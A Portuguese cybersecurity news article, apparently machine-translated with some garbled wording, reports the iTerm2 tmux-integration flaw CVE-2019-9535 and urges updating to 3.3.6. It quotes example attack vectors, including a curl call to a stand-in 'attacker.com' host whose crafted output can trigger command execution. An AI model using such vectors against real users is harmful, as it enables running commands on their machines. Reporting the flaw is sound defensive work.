Casa > cibernético Notícias > CVE-2019-9535: 7-Bug Year-Old no iTerm2 MacOS App
CYBER NEWS

CVE-2019-9535: 7-Bug Year-Old no iTerm2 MacOS App

iTerm2, um MacOS emulador de terminal aplicativo bem conhecido open-source, foi encontrado vulneráveis ​​ao e falha crítica, que é conhecido como CVE-2019-9535.

A falha foi descoberta durante uma auditoria patrocinado pela Mozilla, a empresa por trás do navegador Firefox. Quanto ao propósito de iTerm2, o aplicativo é quase idêntico ao aplicativo MacOS Terminal nativo, e é uma substituição do Terminal e sucessor do iTerm.




CVE-2019-9535 – Uma vulnerabilidade crítica de segurança no iTerm2

Uma auditoria de segurança financiada pelo Mozilla Open Source Support Program (MUSGO) descobriu uma vulnerabilidade crítica de segurança no amplamente usado emulador de terminal macOS, iTerm2. Depois de encontrar a vulnerabilidade, Mozilla, Segurança radicalmente aberta (ROS, a empresa que realizou a auditoria), e o desenvolvedor do iTerm2, George Nachman, trabalharam juntos para desenvolver e lançar um patch para garantir que os usuários não estivessem mais sujeitos a esta ameaça de segurança, disse Tom Ritter da Mozilla em uma postagem de blog detalhando o problema.

A vulnerabilidade foi descoberta no recurso de integração tmux do iTerm2. A pior parte é que está lá há pelo menos 7 anos. Deve-se observar que o problema pode não ser tão fácil de explorar, pois requer a interação do usuário. Não obstante, o fato de que pode ser explorado por comandos torna-o suficientemente perigoso.

relacionado: [wplinkpreview url =”https://sensorstechforum.com/5-macos-vulnerabilities-shouldnt-overlooked/”] 5 MacOS vulnerabilidades que não deve ser negligenciado

Em resumo, CVE-2019-9535 é considerado um sério problema de segurança, pois pode permitir que um invasor execute comandos na máquina de um usuário quando ele está visualizando um arquivo ou recebendo entrada criada em iTerm2.

Todos os usuários, como desenvolvedores e administradores, de iTerm2 são instados a atualize o mais rápido possível para a versão mais recente do aplicativo (3.3.6).

De acordo com Ritter, “um invasor que pode produzir saída para o terminal pode, em muitos casos, execute comandos no computador do usuário.” Os vetores de ataque incluem a conexão com um servidor SSH controlado pelo invasor ou comandos como curl https://attacker.com e cauda -f / var / log / apache2 / referer_log. Esperamos que a comunidade encontre muitos mais exemplos criativos, o pesquisador acrescentou.

O patch deve ser aplicado imediatamente, pois pode ser explorado de maneiras desconhecidas, pesquisadores alertam.

Milena Dimitrova

Um escritor inspirado e gerente de conteúdo que está com SensorsTechForum desde o início do projeto. Um profissional com 10+ anos de experiência na criação de conteúdo envolvente. Focada na privacidade do usuário e desenvolvimento de malware, ela acredita fortemente em um mundo onde a segurança cibernética desempenha um papel central. Se o senso comum não faz sentido, ela vai estar lá para tomar notas. Essas notas podem mais tarde se transformar em artigos! Siga Milena @Milenyim

mais Posts

Me siga:
Twitter

Deixe um comentário

seu endereço de e-mail não será publicado. Campos obrigatórios são marcados *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our Política de Privacidade.
Concordo